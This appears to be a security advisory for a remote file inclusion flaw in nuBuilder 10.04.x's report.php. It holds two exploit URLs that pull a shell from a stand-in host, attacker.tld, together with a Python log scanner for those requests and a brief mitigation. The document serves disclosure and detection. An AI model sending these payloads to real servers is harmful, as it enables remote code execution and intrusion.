Vendor: nuBuilder
By: Ahlspiess
CVSS: 7.5 HIGH
Remote File Inclusion
CWE: 98
Product Name: nuBuilder
Affected Version From: 10.04.x
Affected Version To: 10.04.x
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows, Linux, Mac
2009
nuBuilder 10.04.x and lower Remote File Inclusion
nuBuilder 10.04.x and lower is vulnerable to Remote File Inclusion. The vulnerable file is report.php, which uses the $GLOBALS['StartingDirectory'] variable in an include without any sanitization. This allows an attacker to inject malicious code into the application. The exploit can be tested against the PHP configuration register_globals = On or Off, with allow_url_include = On.
When register_globals = Off, the exploit can be triggered by sending a request to http://site.tld/report.php?StartingDirectory=http://attacker.tld/shell.txt?.
When register_globals = On, the exploit can be triggered by sending a request to http://site.tld/report.php?GLOBALS[StartingDirectory]=http://attacker.tld/shell.txt?.
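Because no patch is listed, it is worth checking web server logs for the two request forms described above. The following is an added example, not code from the advisory or from nuBuilder: it assumes combined-format access logs, the function names are hypothetical, and the sample log lines are constructed.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Parameter names taken from the advisory (compared case-insensitively).
PARAM_NAMES = {"startingdirectory", "globals[startingdirectory]"}
# Value that begins with a URL scheme or stream wrapper instead of a local path.
REMOTE_VALUE = re.compile(r"^\s*(?:[a-z][a-z0-9+.\-]*://|data:|//)", re.I)
# Request field of a combined-format access log line (assumed log format).
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')


def suspicious_params(target):
    """Return (name, value) pairs in a request target that fit the advisory."""
    parts = urlsplit(target)
    if not unquote(parts.path).lower().endswith("/report.php"):
        return []
    hits = []
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        # parse_qsl decodes once; decode again to catch double-encoded input.
        name, value = unquote(name).lower(), unquote(value)
        if name in PARAM_NAMES and REMOTE_VALUE.match(value):
            hits.append((name, value))
    return hits


def scan(lines):
    """Return [(line_number, hits)] for log lines with a suspicious request."""
    found = []
    for number, line in enumerate(lines, 1):
        match = REQUEST.search(line)
        hits = suspicious_params(match.group(1)) if match else []
        if hits:
            found.append((number, hits))
    return found


# Constructed sample lines; host names reuse the advisory's placeholders.
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2010:10:00:00 +0000] "GET /report.php?StartingDirectory=http://attacker.tld/shell.txt? HTTP/1.1" 200 512',
    '192.0.2.11 - - [01/Jan/2010:10:00:05 +0000] "GET /report.php?GLOBALS%5BStartingDirectory%5D=http%3A%2F%2Fattacker.tld%2Fshell.txt%3F HTTP/1.1" 200 512',
    '192.0.2.12 - - [01/Jan/2010:10:00:09 +0000] "GET /report.php?StartingDirectory=reports HTTP/1.1" 200 900',
    '192.0.2.13 - - [01/Jan/2010:10:00:12 +0000] "GET /index.php?page=home HTTP/1.1" 200 1200',
]

if __name__ == "__main__":
    for number, hits in scan(SAMPLE_LOG):
        print(number, hits)
```

Parameters sent in a POST body do not appear in access logs, so this check covers only the query-string forms shown in the description.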
Mitigation:
Input validation should be used to prevent Remote File Inclusion attacks. The application should validate all user input and reject any input that contains malicious code.